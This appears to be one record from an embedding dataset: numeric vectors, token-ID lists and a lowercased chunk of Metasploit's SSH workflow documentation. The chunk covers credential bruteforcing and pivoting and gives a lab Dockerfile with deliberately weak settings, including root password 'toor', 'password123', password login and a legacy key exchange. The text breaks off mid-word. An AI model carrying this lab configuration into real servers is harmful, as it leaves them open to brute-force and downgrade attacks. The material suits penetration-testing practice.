-0.37872400879859924, 0.8432223200798035, -0.11706787347793579, 0.8052061200141907, -0.19666673243045807, 0.33679741621017456, 0.41796746850013733, -0.6898500919342041, -0.4847261309623718, 0.07172595709562302, 0.7394340634346008, 0.06703716516494751, 0.11130184680223465, 0.8606535196304321, 0.4332951009273529, 0.168119877576828, -0.7685785889625549, 0.5407081842422485, 0.4875069856643677, 0.3125922977924347, 0.6035988330841064, 0.11278887093067169, 0.581973135471344, 0.43997377157211304, -0.7994851469993591, -0.2398270219564438, 0.5135143399238586, 0.0723482295870781, -0.10085108131170273, 0.6524156332015991, 0.5746991038322449, 0.3757656514644623, 0.010059039108455181, -0.02221185527741909, 0.5005457997322083, -0.5120035409927368, -0.29250407218933105, 0.09778225421905518, -0.3232647478580475, 0.4530125558376312, 0.17556673288345337, -1.3664028644561768, -0.544394314289093, -0.21625980734825134, 0.2657020688056946, 0.33978623151779175, -0.09786112606525421, 0.006939463783055544, 0.804768979549408, 0.34376946091651917, -0.3339901566505432, 0.38787323236465454, 0.3389574885368347, 0.6335985660552979, -0.7711672782897949, 0.2574405372142792, -0.14845353364944458, -0.01302165724337101, -0.6117652058601379, -0.34693577885627747, -0.43555817008018494, 0.8289790749549866, 0.5091472864151001, 0.6458337903022766, -0.1641809493303299, -0.4935552179813385, 0.4779670536518097, -0.9420380592346191, -0.24235548079013824, -0.26492777466773987, -0.7315237522125244, 0.6669440269470215, -0.20367074012756348, -0.15176831185817719, 0.634813666343689, -0.03248919919133186, 0.19197629392147064, 0.19334056973457336, 1.10935378074646, -0.35305649042129517, 0.6687694787979126, 0.010428699664771557, -0.375649631023407, -0.4712153673171997, -0.04703928157687187, -0.23309601843357086, -0.2845817506313324, -0.412438303232193, -0.6104841232299805, -0.23579402267932892, -0.14099444448947906, -0.4361599087715149, -0.2844424545764923, 0.0738632008433342, 0.496791273355484, -0.9957010746002197, 0.19826951622962952, -0.4948645532131195, -0.9272732734680176, -0.10777028650045395, 0.6800098419189453, 0.13086523115634918, 0.41892650723457336, -0.07390715181827545, -0.14950208365917206, -0.07970333844423294, -0.27690568566322327, -0.7181692719459534, 0.1861119270324707, -0.46299928426742554, -0.6223134994506836, 0.34945157170295715, -0.42953571677207947, -0.40875348448753357, 0.025305870920419693, -0.08983208239078522, -0.32660549879074097, 0.7220100164413452, 0.6682005524635315, -0.07412445545196533, 0.3175336420536041, -0.6347240805625916, -0.7360883951187134, -0.22864168882369995, 0.696877658367157, -0.36765626072883606, 0.6841654777526855, 0.28782492876052856, -0.49223560094833374, 0.3636701703071594, -0.5915322303771973, 0.8784621357917786, 0.7005449533462524, 0.18619199097156525, -0.6396973729133606, 0.08405718207359314, -0.17309501767158508, -0.4545714557170868, 0.5537327527999878, 0.8846676349639893, 0.07412823289632797, -0.10915243625640869, -0.8822104930877686, -0.10309557616710663, -0.5980744957923889, 0.15024831891059875, -0.1420084834098816, 0.6727250218391418, -0.5641393661499023, -0.5680273175239563, 0.8829618692398071, -1.4943374395370483, 3.8882086277008057, 0.873931348323822, 0.8617746233940125, 0.8755277395248413, 0.5094752907752991, 0.9001261591911316, 0.043612025678157806, -0.09768112748861313, 0.05275975167751312, 0.12985655665397644, 1.1581053733825684, 0.2990572154521942, -0.15758642554283142, 0.8733452558517456, 0.2154892534017563, 0.8171084523200989, -0.7437412738800049, -0.5154445767402649, 0.004693404771387577, -0.1301249861717224, -0.4980746805667877, 0.22906599938869476, 0.5180668234825134, 0.45463141798973083, 0.3962331712245941, 0.05430489033460617, 0.4096216857433319, -0.17127195000648499, -0.09269285947084427, -0.45880207419395447, 0.6030892133712769, -1.1485612392425537, 0.27672579884529114, -0.028130345046520233, -0.6539899706840515, -0.17095805704593658, 0.0846189558506012, -1.3615840673446655, 0.06850825250148773, -0.08709300309419632, -0.1316514015197754, -0.14311271905899048, 0.4736146032810211, -0.8848937153816223, 0.4300708770751953, -0.028623228892683983, -0.1577226221561432, 0.7403162717819214, 0.7468224763870239, -0.6073663234710693, 0.6734464168548584, -0.6206433176994324, 0.43778663873672485, -1.155644178390503, -0.5740015506744385, 0.23954305052757263, 0.058672938495874405, -0.1636379212141037, -0.6853205561637878, 0.015612771734595299, -0.027208322659134865, -0.3831477165222168, -0.2880816161632538, 0.4566924273967743, -0.07058754563331604, 0.7185954451560974, 0.4079487919807434, 0.6490799784660339, 0.25112074613571167, -0.6856237053871155, -0.5162784457206726, 0.18047857284545898, 0.06410589069128036, 0.00436455337330699, 0.21222026646137238, 0.5839199423789978, 0.25071701407432556, 0.1400885432958603, 0.8941235542297363, -0.7515224814414978, -0.6361681818962097, 0.4500941038131714, -0.011626704595983028, -0.7002125382423401, 0.6494391560554504, 0.6051123738288879, -0.25993648171424866, -0.1802045702934265, 0.12281350046396255, 0.23376354575157166, 1.0605624914169312, 0.12635990977287292, 0.13136422634124756, -0.4955820143222809, -0.6233761310577393 ]
[ 7561, 1000, 1010, 1000, 2204, 1000, 1010, 1000, 5432, 1000, 1010, 1000, 18558, 1000, 1010, 1000, 2139, 8569, 2290, 1000, 1033, 1065, 1010, 1000, 4471, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1065, 1065, 102 ]
metasploit
119.txt
4
[CLS] ssh workflowsssh, also known as secure shell or secure socket shell, is frequently found on port 22 / tcp. the protocol allows for ssh clients to securely connect to a running ssh server to execute commands against, the protocol also supports tunneling network traffic - which metasploit can leverage for pivoting purposes. metasploit has support for multiple ssh modules, including : version enumerationverifying / bruteforcing credentialsopening sessionspivoting supportthere are more modules than listed here, for the full list of modules run the search command within msfconsole : msf6 > search ssh lab environmentthere are multiple ssh servers to choose from and install on a host machine, including : openssh - openbsd secure shell, most populardropbearit is also possible to use docker. first create a new dockerfile : from alpine : latest run apk add - - update run apk - - no - cache add openssh run ssh - keygen - a run echo'root : toor'| chpasswd run echo $'authorizedkeysfile. ssh / authorized _ keys \ n \ gatewayports no \ n \ x11forwarding no \ n \ subsystem sftp / usr / lib / ssh / sftp - server \ n \ passwordauthentication yes \ n \ allowtcpforwarding yes \ n \ passwordauthentication yes \ n \ allowtcpforwarding yes'> / etc / ssh / sshd _ config run echo " kexalgorithms diffie - hellman - group1 - sha1 " > > / etc / ssh / sshd _ config run addgroup - g 700 test _ user \ & & adduser - g test _ user - d - u 700 - s - h / home / test _ user - s / bin / sh test _ user run echo -n'test _ user : password123'| chpasswd expose 22 cmd [ " / usr / sbin / sshd ", " - d " ] build and run : docker build - - tag ssh _ lab : latest - < dockerfile docker run - - rm - it - - publish 127. 0. 0. 1 : 2222 : 22 ssh _ lab : latest it should now be possible to test the ss
[ 0.296785831451416, 0.06527405232191086, -0.08731450885534286, 0.5485007762908936, -0.302076131105423, -0.429429292678833, -0.36835432052612305, 0.3599146008491516, 0.38828518986701965, 0.5621759295463562, -0.1204875186085701, -0.14575205743312836, 0.28123804926872253, -0.6697724461555481, -0.6918718814849854, -0.1498495638370514, 0.2043917179107666, 0.29137924313545227, -0.6508327126502991, -0.23708458244800568, 0.40461623668670654, -0.1075257956981659, -0.634988009929657, -0.799152672290802, -0.2519666254520416, 0.8243093490600586, 0.36911293864250183, 0.21804077923297882, 0.5126293301582336, 0.562394380569458, 0.31747546792030334, 0.37822139263153076, 0.15070214867591858, -0.28053775429725647, 0.6104599237442017, -0.3537643849849701, 0.8044098615646362, -0.9966223239898682, 0.24625790119171143, -0.8481572270393372, 0.20188137888908386, 0.2870021462440491, 0.02849307842552662, -0.549652636051178, -0.16640020906925201, -0.42951473593711853, 0.034413035959005356, -0.264987975358963, 0.22920115292072296, -0.29220882058143616, -0.2384096086025238, 0.22629356384277344, -0.17498362064361572, 0.26006999611854553, -0.012583996169269085, 0.0635681226849556, -0.5088642835617065, 0.24395142495632172, -0.34280794858932495, 0.3825778067111969, 0.21044275164604187, 0.4075932800769806, -0.1412234902381897, -0.8855620622634888, 0.1524868756532669, 0.580248236656189, 0.48102691769599915, -0.2236398607492447, 0.23359555006027222, -0.3907581567764282, -0.3840671181678772, 0.8159101605415344, -0.6180979609489441, -0.7536454796791077, -0.2331284135580063, -0.08944914489984512, -0.023009497672319412, -0.15307363867759705, -0.0028781092260032892, 0.7244986891746521, -0.15539778769016266, 0.5605661273002625, -0.03207314759492874, -0.7137640118598938, -0.2630743980407715, -0.2825431525707245, 0.5125479698181152, 0.5833489298820496, -0.6515164971351624, 0.5461466312408447, 0.256980836391449, 0.07947981357574463, -0.7075912356376648, -0.26785770058631897, 0.2998179793357849, 0.6642128229141235, -0.5111415386199951, -0.2297021895647049, -0.24179838597774506, 0.045780666172504425, -0.17402030527591705, 0.7026926875114441, 0.07243731617927551, 0.16310811042785645, -0.31295081973075867, 0.18538954854011536, 0.5676613450050354, -0.1408471316099167, -0.6530763506889343, -0.5257314443588257, 0.8853006958961487, -0.32339322566986084, -0.10896237939596176, -0.8889889717102051, -0.23468491435050964, 0.3198051452636719, 0.8486254811286926, -0.1894790232181549, -0.5852825045585632, 0.524660050868988, -0.20134641230106354, -0.3557412028312683, 0.7627066373825073, -0.19358506798744202, 0.17497779428958893, 0.24172891676425934, 0.3915092349052429, 0.3902222216129303, -0.8426595330238342, -0.7694860696792603, 0.16078248620033264, -0.30847302079200745, -0.06056712567806244, 0.4739413559436798, -0.6142982244491577, 0.23983871936798096, -0.20433259010314941, -0.08250457793474197, 0.9002835750579834, -0.6463598012924194, -0.08497969061136246, 0.34931161999702454, -0.0207093246281147, 1.4884716272354126, 0.3824006915092468, 0.2392263561487198, -0.5043830275535583, -0.2383725792169571, -0.42410874366760254, 0.4974137842655182, 0.17717088758945465, -0.11095937341451645, -0.11636270582675934, -0.5804932117462158, -0.14400850236415863, 0.5100408792495728, -0.7336129546165466, 0.5474808216094971, -0.44517892599105835, 0.5741370320320129, -0.5470685362815857, 0.7769196033477783, 0.3475082814693451, 0.32367968559265137, 0.3547949492931366, 0.44949281215667725, -0.2731476128101349, -0.06408590078353882, -0.26122182607650757, -0.06908779591321945, 0.030002377927303314, 0.4172013998031616, 0.06875839084386826, 0.23567348718643188, 1.3496640920639038, 0.3698531687259674, -0.21863052248954773, 0.15285459160804749, -0.34919965267181396, 0.17842556536197662, -0.5242659449577332, 0.5267375111579895, 0.8472323417663574, 0.7224669456481934, 0.6535437107086182, -0.11921890825033188, -0.2808520197868347, -0.48740246891975403, -0.32587930560112, -0.1822117120027542, -0.5800651907920837, 0.7315114736557007, -0.8255867958068848, 0.522702693939209, 0.5642417669296265, 0.18286995589733124, -1.115944266319275, -0.4891427457332611, 0.3476516008377075, -0.5164649486541748, -0.2961970269680023, 0.7875797152519226, 0.02031274139881134, 0.5193741917610168, -0.32293272018432617, -0.3688597083091736, 0.9307227730751038, 1.0670366287231445, 0.18241700530052185, 0.6479007601737976, 0.672596275806427, -0.2665092349052429, -0.7584462761878967, 0.23470844328403473, 0.5140969157218933, -0.1515997052192688, -0.760646641254425, -0.0010941211367025971, -0.03983280435204506, 0.057264599949121475, 0.20682795345783234, 0.9623810648918152, 0.2262735813856125, 0.2930794954299927, -0.6039559841156006, -0.0986095517873764, -0.00811473187059164, 0.3054707646369934, 0.18668757379055023, -0.5220461487770081, 0.038906317204236984, 0.2563081979751587, 0.03862812742590904, 0.7571819424629211, -0.2952870726585388, -0.7026892304420471, 0.07637109607458115, 0.4376479983329773, -0.1744329184293747, -0.06313222646713257, 0.46487563848495483, 0.6967688798904419, 0.3327810764312744, 0.5725013017654419, 0.6565518975257874, 0.6845837831497192, 0.396856427192688, 0.08994058519601822, -0.3936181664466858, 1.012940764427185, 0.09813148528337479, 0.9209414124488831, 0.8104063868522644, -0.276081919670105, -0.6685949563980103, -0.2570660412311554, 0.6775180697441101, 0.5421192646026611, -0.8406347036361694, -1.1029281616210938, -0.30789852142333984, -0.11631229519844055, -0.057016223669052124, -0.039040643721818924, -0.15376845002174377, 0.21790166199207306, -0.2800261974334717, 0.023674264550209045, 0.01510041207075119, -0.17092330753803253, -0.8557626008987427, 0.07847179472446442, -0.3143436908721924, -0.6699697971343994, -0.7559108138084412, 0.14788579940795898, 0.04624338820576668, 0.03794312849640846, 1.0176315307617188, -0.2835932970046997, -0.8835351467132568, 0.375266432762146, 0.3762340247631073, 0.42076602578163147, 0.09493017941713333, -0.20404931902885437, -0.7871536016464233, -0.03232938051223755, -0.13350261747837067, 0.5738975405693054, -0.7207885980606079, -0.25324806571006775, -0.3944784104824066, 0.02302084118127823, 0.17526337504386902, -0.16216854751110077, 0.3620010316371918, 0.05970752611756325, -0.22583335638046265, -0.09703172743320465, 0.5258331894874573, -0.18627023696899414, 0.7412605881690979, -0.20259645581245422, 0.040851954370737076, 0.6255255937576294, 0.08042442798614502, 0.4318735599517822, 0.6362438201904297, 0.7273207306861877, 0.09924530237913132, -0.10089723020792007, -0.2761969566345215, 0.588941216468811, -0.6379240155220032, 0.9200882911682129, 0.6892701387405396, 0.2509418725967407, 0.14749345183372498, -0.6417356133460999, 0.20883809030056, -0.5642780065536499, -0.14732344448566437, -0.3133293092250824, -0.09914273768663406, 0.5373442769050598, 0.22756673395633698, -0.6529703736305237, 0.4339412748813629, -1.1267547607421875, 0.1907792091369629, 0.35836896300315857, -0.3371308743953705, 0.8674596548080444, 0.3021700084209442, 0.3805951774120331, 0.09082990884780884, -0.012186492793262005, 0.38599786162376404, 0.3567228615283966, 0.24817702174186707, -0.6654022932052612, 0.4271713197231293, 0.2667596936225891, -0.7005632519721985, 0.8371508121490479, 0.34117600321769714, -0.29366636276245117, -0.5730363726615906, -0.09306555241346359, -0.1830885410308838, 0.12334994226694107, 0.7665138840675354, 0.2565125823020935, 0.3030792772769928, 0.4752654433250427, -0.8197243213653564, -0.11023693531751633, 0.3855821192264557, 0.3183610141277313, -0.03500835597515106, -0.3602136969566345, 0.038441650569438934, 0.5570793151855469, -0.41464388370513916, -0.39229223132133484, -0.2808804512023926, 0.056896574795246124, 0.2771109640598297, 0.2329944521188736, 0.3738565444946289, 0.3334304690361023, -0.3361029326915741, 1.0422956943511963, -0.5543656945228577, -0.804792046546936, 0.7842331528663635, 0.14527346193790436, 0.22351780533790588, -0.28563234210014343, 0.515263557434082, -0.3984128534793854, -0.01745975948870182, -0.04322139173746109, 0.14890336990356445, -0.33081454038619995, -0.36294081807136536, -0.569437563419342, 0.3437510132789612, 0.09809928387403488, -0.38077911734580994, -0.48620882630348206, 0.3074640929698944, -0.05927235260605812, -0.7367537021636963, -0.40476229786872864, -0.0913398265838623, 0.771984338760376, 0.70054030418396, 0.2729261517524719, 0.6738417744636536, 0.35180723667144775, -0.3236638605594635, 0.08517889678478241, -0.2793877124786377, 0.391549676656723, -0.3674822747707367, 0.5077075958251953, -0.3250383734703064, -0.011670059524476528, -0.21213941276073456, -0.10891652852296829, -0.15018849074840546, 0.10061852633953094, 0.3690890967845917, -0.35524898767471313, -0.18248851597309113, -0.840049147605896, 0.1680935025215149, -0.4610719382762909, -0.23651081323623657, -0.004253904800862074, 0.01113453134894371, 0.9681999683380127, 0.23757123947143555, -0.12490476667881012, -0.30031415820121765, -0.4592913091182709, -0.006158973090350628, -0.3718898892402649, -0.13959528505802155, -0.1761895716190338, -0.38500651717185974, -0.22309496998786926, -0.7527468800544739, 0.1829940676689148, 0.06668269634246826, 0.27034130692481995, 0.19164103269577026, -1.107493281364441, 0.2023308426141739, 0.5120362043380737, -0.24672383069992065, -0.7122092843055725, -0.09484720230102539, 0.4608403146266937, 0.9216464757919312, 0.4625530242919922, -0.11507850885391235, -0.505716860294342, -0.018043525516986847, -0.47827333211898804, 1.1049926280975342, -0.38898906111717224, 0.24388132989406586, 0.0725351944565773, -0.10525182634592056, -0.49362894892692566, 0.5027625560760498, -0.4336782395839691, -0.31022921204566956, -0.24211901426315308, -0.01902718096971512, -0.5858054161071777, 0.17314079403877258, 0.7025778889656067, -0.6331801414489746, -0.057102371007204056, 0.34064486622810364, 0.29195231199264526, -0.34216955304145813, 0.018312420696020126, -0.07971183955669403, -0.296150267124176, 0.5860846042633057, -0.6415172815322876, 1.086426854133606, 0.9939877986907959, -0.2565315365791321, -0.309253066778183, -0.31131476163864136, 0.8174188137054443, 0.2310100495815277, 0.07060258090496063, -0.7447701096534729, -0.40397459268569946, 0.25636035203933716, 0.37992268800735474, -0.004499831702560186, 0.36084115505218506, -0.14867247641086578, -0.005607848986983299, -0.5321606397628784, -0.2667793035507202, -0.3348265290260315, -0.09221573919057846, -0.0433669239282608, -0.21472123265266418, -0.021380750462412834, 0.026572419330477715, 0.9084389805793762, -0.3452915549278259, -0.8085083365440369, 0.013663568533957005, -0.8542007803916931, -0.3131486773490906, -1.0131152868270874, -0.13690461218357086, -0.3555036783218384, 0.34182190895080566, -0.27897903323173523, -0.06419724225997925, -0.14022548496723175, -0.07730512320995331, -0.3079318702220917, 0.28470611572265625, -0.07609470188617706, -0.5022229552268982, 0.4465666711330414, 0.863159716129303, 0.4319206774234772, -0.7570092678070068, -0.05178401991724968, 0.03997878357768059, -0.20286934077739716, 0.1300678849220276, -0.5079346895217896, -0.3828905522823334, -0.31874293088912964, -1.1738286018371582, -0.1135656014084816, -0.6149663925170898, 0.2589642107486725, -0.48122459650039673, -0.22946317493915558, -0.7597835063934326, 0.3822551369667053, 0.42784634232521057, -0.40972644090652466, -0.14581261575222015, -0.1417285054922104, -0.36492905020713806, 0.16784070432186127, -0.8149109482765198, -0.22069843113422394, -0.5451879501342773, -0.3220999538898468, 0.8629034757614136, -0.5313867926597595, 0.5319962501525879, -0.45500636100769043, 0.4061278998851776, -0.11056521534919739, 0.3475407361984253, -0.7929059267044067, -0.5678889155387878, -0.3006137013435364, 0.4806581437587738, 0.46094706654548645, 0.47373947501182556, -1.0816221237182617, 0.3492249548435211, -0.05461474880576134, -0.1715729832649231, -0.3898298740386963, -0.550602376461029, 0.39655596017837524, 0.3347737789154053, 1.1281154155731201, -0.25673559308052063, -0.11139208823442459, -0.1421491503715515, 0.6022184491157532, 0.4078148901462555, 0.16546884179115295, -0.6819940805435181, -0.2728557586669922, -0.0712808147072792, -0.678820788860321, 0.633970320224762, 0.24803704023361206, -0.41902783513069153, 0.032882317900657654, 0.3076714277267456, 0.23760579526424408, -0.40275463461875916, 0.1822025626897812, 0.8433163166046143, -0.022211702540516853, 0.5452459454536438, -1.0116368532180786, 0.5152429342269897, 0.9729418158531189, -0.07423897832632065, -0.24299673736095428, -0.03395413979887962, 0.16357338428497314, -0.0982983186841011, -0.7336650490760803, -0.25163400173187256, -0.40369948744773865, -1.106528878211975, 0.4386212229728699, -0.07233107835054398, 0.459143728017807, 0.0023998357355594635, -0.9447949528694153, 0.1378910392522812, 0.4085136950016022, 0.05384870618581772, -0.5144772529602051, 0.6302164793014526, 0.3318955600261688, 0.20011894404888153, -0.5522413849830627, 0.41719672083854675, -0.17255087196826935, 0.01264738105237484, 0.4588167667388916, 0.13459724187850952, -0.7846761345863342, 0.9133526086807251, 0.4472295343875885, -0.8661344051361084, -0.4716765582561493, -0.8805007934570312, -0.2669832408428192, 0.36625683307647705, -0.3482861816883087, -0.727836549282074, -0.43003129959106445, 0.40710872411727905, -0.12684762477874756, 0.665986955165863, 0.22491396963596344, 0.07211639732122421, -0.45295462012290955, 0.26732486486434937, 0.023325162008404732, 0.13493840396404266, 0.5907033681869507, -0.4717023968696594, -0.6932820081710815, -1.1890619993209839, -0.2838803231716156, 0.35419079661369324, -0.08509264141321182, 0.7896603941917419, -0.20032785832881927, 0.35552746057510376, 0.060317233204841614, -0.3360327184200287, 0.3970532715320587, -0.09793273359537125, 0.6434680819511414, 0.9233015179634094, -0.1456916779279709, -0.5199227929115295, -0.006816129665821791, 0.13534300029277802, -0.2793625593185425, 0.6040624976158142, 0.08367770910263062, -0.3790222704410553, -0.3516521155834198, 0.0898473784327507, -0.2243257761001587, -0.7255232930183411, -0.34834229946136475, -0.6210528016090393, 0.1196514144539833, -0.06593544781208038, -0.23881162703037262, 0.1520400494337082, -0.05350135639309883, -0.6167430877685547, -0.06269753724336624, -0.5943776965141296, 0.5113233923912048, -0.919563353061676, 0.2663763165473938, -0.4930867850780487, -0.0926719382405281, -0.2342066764831543, -0.4755144715309143, -0.13633938133716583, -0.5334320068359375, -0.6883668303489685, -0.8490174412727356, 0.26203829050064087, -0.33447983860969543, -0.3643607497215271, 0.23298490047454834, -0.18433845043182373, -0.15098878741264343, 0.03495381772518158, -0.6762202382087708, -0.15992207825183868, 0.6683765053749084, -0.02562600187957287, 0.6524924635887146, -0.0706549733877182, -0.42480435967445374, 0.2931850254535675, -0.07043156772851944, -0.07639975100755692, 0.22382214665412903, 0.044308751821517944, -0.0060013532638549805, -0.26274120807647705, -0.2670612037181854, 0.18095359206199646, -0.03244219347834587, -0.6263299584388733, -0.06649769097566605, -0.21763832867145538, -0.4888387620449066, 0.3905431032180786, -0.014820263721048832, 0.21136777102947235, 0.6706113815307617, 0.2751809358596802, 0.3828137516975403, 0.17402037978172302, 0.21234485507011414, 0.3405521512031555, -0.6196786761283875, -0.010850970633327961, -0.09815215319395065, 0.3557705283164978, -0.48059532046318054, -0.1396017223596573, 0.8374567627906799, 0.15611107647418976, 0.39862826466560364, -0.30835407972335815, 0.009686706587672234, -0.20442943274974823, -0.3053426444530487, -0.125951886177063, 0.12140088528394699, 0.06361173838376999, -0.43890735507011414, -0.1201685294508934, 0.0744253471493721, -0.7757048606872559, 0.054776061326265335, -0.33823052048683167, -0.0514431931078434, -0.24757541716098785, -0.16356849670410156, -0.38976505398750305, -0.47150999307632446, 0.012383608147501945, 0.30053600668907166, -0.2155839502811432, -0.11751838773488998, 0.16868232190608978, -0.8617000579833984, 0.44059300422668457, 1.1919097900390625, -0.638634204864502, -0.21376097202301025, -0.8613263964653015, 0.691259503364563, -0.34861963987350464, -0.8748209476470947, 0.47343406081199646, 0.9637293219566345, 0.17525812983512878, -0.16088919341564178, -0.7016090750694275, 0.32631945610046387, 0.31848275661468506, -0.2167997658252716, -0.41460955142974854, 0.15198715031147003, -0.8057149052619934, 0.558935284614563, -0.441207617521286, 0.0492764450609684, 0.009873401373624802, 0.3403185307979584, 0.12583774328231812, -0.41298431158065796, -0.40118280053138733, -0.20926617085933685, 0.0237652026116848, 0.04065351188182831, -0.19468005001544952, 0.7529439926147461, -0.10645011067390442, -0.49355560541152954, 0.27998295426368713, -0.420329749584198, -0.16999825835227966, 0.5774616599082947, 0.35286250710487366, 0.13275174796581268, 0.6173213720321655, 0.6623892784118652, -0.2698909342288971, -0.04309116303920746, 0.43204307556152344, 0.06863514333963394, -0.9001755714416504, 0.5467880964279175, -0.40286707878112793, 0.11830754578113556, 0.07804950326681137, -0.46492886543273926, 0.0704687163233757, 0.17346838116645813, 0.4645783305168152, 0.42106541991233826, 0.32519546151161194, 0.5675190687179565, -0.768539309501648, 0.5621629357337952, -0.2331676483154297, -0.292608380317688, 0.3575451076030731, 0.007567836903035641, -0.18491975963115692, 0.6184443831443787, 0.7765985131263733, -0.26184141635894775, -0.09471692889928818, 0.859118640422821, -0.18663156032562256, -0.06448855996131897, -0.18420866131782532, 0.10676675289869308, -0.5786149501800537, -0.05450616404414177, 0.4201603829860687, -0.2091948240995407, -0.17397449910640717, 0.0735628679394722, 0.20228737592697144, 0.5027430057525635, 0.3554808497428894, 0.15727925300598145, -0.3031110465526581, -1.030248999595642, 0.4273427426815033, -0.05307674780488014, 0.17776820063591003, 0.3536849915981293, -0.17625091969966888, -0.7976140379905701, 0.988510251045227, -0.04620731249451637, 0.3926423490047455, 0.37192416191101074, 0.9430966377258301, -0.2525428831577301, 0.16625793278217316, 0.34189632534980774, -0.2745587229728699, -0.3412019610404968, -0.2950051426887512, -0.29199498891830444, 0.017922870814800262, 0.11650075018405914, -0.5677359700202942, 0.938718855381012, -0.4686252176761627, 0.06639736890792847, -0.8789873719215393, 0.5217176079750061, -0.48715853691101074, -0.9158613681793213, 0.7726303339004517, -0.23491743206977844, 0.004154145251959562, 0.2811500132083893, 0.22776928544044495, 0.5345848798751831, -0.1073855310678482, -0.39883261919021606, -0.5952319502830505, -0.059684500098228455, -0.12748464941978455, -0.13331028819084167, 0.6962116956710815, -0.06416228413581848, -0.45856553316116333, -0.0296102873980999, -0.8591391444206238, -0.32168275117874146, 0.10384303331375122, -0.782086968421936, -0.5163304805755615, 0.482799768447876, 0.34296849370002747, 0.6643345952033997, 0.9465147256851196, -0.5623505711555481, 0.31024599075317383, -0.17210549116134644, 0.6926334500312805, -0.4295898973941803, 0.36209961771965027, 0.17408131062984467, -0.311355859041214, -0.027249518781900406, 0.015410972759127617, 0.7356926798820496, -0.03620060533285141, 0.0483291819691658, -0.14392246305942535, -0.11833451688289642, -0.8801990151405334, -0.2124287635087967, 0.2742682993412018, 0.08228061348199844, 0.09936092793941498, -0.2235497385263443, -1.1319410800933838, -0.34735414385795593, -0.6005501747131348, 0.14114691317081451, -0.33311784267425537, -0.18614168465137482, 0.1562500298023224, 0.20613889396190643, -0.021812694147229195, -1.5102431774139404, 4.54347038269043, 0.4984739124774933, 0.15083090960979462, -0.32635989785194397, 0.2346256524324417, 0.6180883646011353, 0.7185441851615906, -0.2200295329093933, 0.5045764446258545, -0.661395788192749, 0.23835688829421997, -0.06697488576173782, 0.6937373280525208, 0.20151126384735107, 0.44803354144096375, 0.40717822313308716, -0.5355628132820129, 0.24477532505989075, 0.1659267097711563, -0.5814589262008667, -0.9711412191390991, -0.5111623406410217, -0.04856614023447037, 0.7984333634376526, 0.006388107314705849, 0.38906654715538025, 0.18675707280635834, -0.39963051676750183, -0.11869857460260391, -0.17081476747989655, -0.22660282254219055, -0.5277422070503235, 0.08066301792860031, -0.20444568991661072, -0.6480094790458679, -0.01931503601372242, 0.2685929536819458, -0.6666732430458069, 0.13365356624126434, -0.04742797091603279, 0.11766317486763, 0.3671160340309143, 0.5362544059753418, -1.0861704349517822, -0.22074057161808014, 0.9395705461502075, -0.31686317920684814, -0.2667361795902252, 0.6408573389053345, -0.610629677772522, 0.6152359843254089, 0.3044758439064026, 0.8398241400718689, -0.0331130214035511, -1.138060212135315, -0.10113667696714401, 0.16302348673343658, -0.4536173343658447, -0.5367830991744995, -0.1635081022977829, 0.36458972096443176, -0.1673598289489746, 0.18789668381214142, -0.15534986555576324, -0.14085447788238525, 0.7021869421005249, -0.4604400396347046, 0.38272562623023987, -0.14413057267665863, 0.15127183496952057, -0.18007506430149078, -0.2818668484687805, -0.20202921330928802, -0.021621521562337875, 0.7591206431388855, -0.2823987305164337, 0.17404715716838837, 0.4936997890472412, 0.9957323670387268, 0.2346087396144867, -0.18367770314216614, -0.38276422023773193, -1.3172991275787354, 0.2177683413028717, 0.7190264463424683, 0.4773968458175659, 0.2720332443714142, -1.3411574363708496, -0.17462611198425293, 0.48955100774765015, 0.5825855135917664, 0.2824571132659912, -0.49607017636299133, 0.18706545233726501, 0.021713554859161377 ]
[ 101, 7020, 2232, 2147, 12314, 4757, 4095, 1010, 2036, 2124, 2004, 5851, 5806, 2030, 5851, 22278, 5806, 1010, 2003, 4703, 2179, 2006, 3417, 2570, 1013, 22975, 2361, 1012, 1996, 8778, 4473, 2005, 7020, 2232, 7846, 2000, 28999, 7532, 2000, 1037, 2770, 7020, 2232, 8241, 2000, 15389, 10954, 2114, 1010, 1996, 8778, 2036, 6753, 5234, 2075, 2897, 4026, 1011, 2029, 18804, 13102, 4135, 4183, 2064, 21155, 2005, 14255, 22994, 2075, 5682, 1012, 18804, 13102, 4135, 4183, 2038, 2490, 2005, 3674, 7020, 2232, 14184, 1010, 2164, 1024, 2544, 4372, 17897, 8156, 6299, 11787, 1013, 26128, 29278, 6129, 22496, 26915, 2075, 6521, 8197, 22994, 2075, 2490, 12399, 2063, 2024, 2062, 14184, 2084, 3205, 2182, 1010, 2005, 1996, 2440, 2862, 1997, 14184, 2448, 1996, 3945, 3094, 2306, 5796, 11329, 5644, 9890, 1024, 5796, 2546, 2575, 1028, 3945, 7020, 2232, 6845, 4044, 12399, 2063, 2024, 3674, 7020, 2232, 14903, 2000, 5454, 2013, 1998, 16500, 2006, 1037, 3677, 3698, 1010, 2164, 1024, 7480, 4095, 1011, 2330, 5910, 2094, 5851, 5806, 1010, 2087, 2759, 25711, 4783, 8486, 2102, 2003, 2036, 2825, 2000, 2224, 8946, 2121, 1012, 2034, 3443, 1037, 2047, 8946, 2121, 8873, 2571, 1024, 2013, 10348, 1024, 6745, 2448, 9706, 2243, 5587, 1011, 1011, 10651, 2448, 9706, 2243, 1011, 1011, 2053, 1011, 17053, 5587, 7480, 4095, 2448, 7020, 2232, 1011, 3145, 6914, 1011, 1037, 2448, 9052, 1005, 7117, 1024, 2205, 2099, 1005, 1064, 10381, 15194, 21724, 2448, 9052, 1002, 1005, 9362, 14839, 22747, 9463, 1012, 7020, 2232, 1013, 9362, 1035, 6309, 1032, 1050, 1032, 11909, 25378, 2053, 1032, 1050, 1032, 1060, 14526, 29278, 7652, 2075, 2053, 1032, 1050, 1032, 4942, 6508, 13473, 2213, 16420, 25856, 1013, 2149, 2099, 1013, 5622, 2497, 1013, 7020, 2232, 1013, 16420, 25856, 1011, 8241, 1032, 1050, 1032, 20786, 4887, 10760, 16778, 10719, 2748, 1032, 1050, 1032, 3499, 13535, 14376, 2953, 7652, 2075, 2748, 1032, 1050, 1032, 20786, 4887, 10760, 16778, 10719, 2748, 1032, 1050, 1032, 3499, 13535, 14376, 2953, 7652, 2075, 2748, 1005, 1028, 1013, 4385, 1013, 7020, 2232, 1013, 7020, 14945, 1035, 9530, 8873, 2290, 2448, 9052, 1000, 17710, 18684, 2140, 20255, 8939, 5244, 4487, 29055, 1011, 3109, 2386, 1011, 2177, 2487, 1011, 21146, 2487, 1000, 1028, 1028, 1013, 4385, 1013, 7020, 2232, 1013, 7020, 14945, 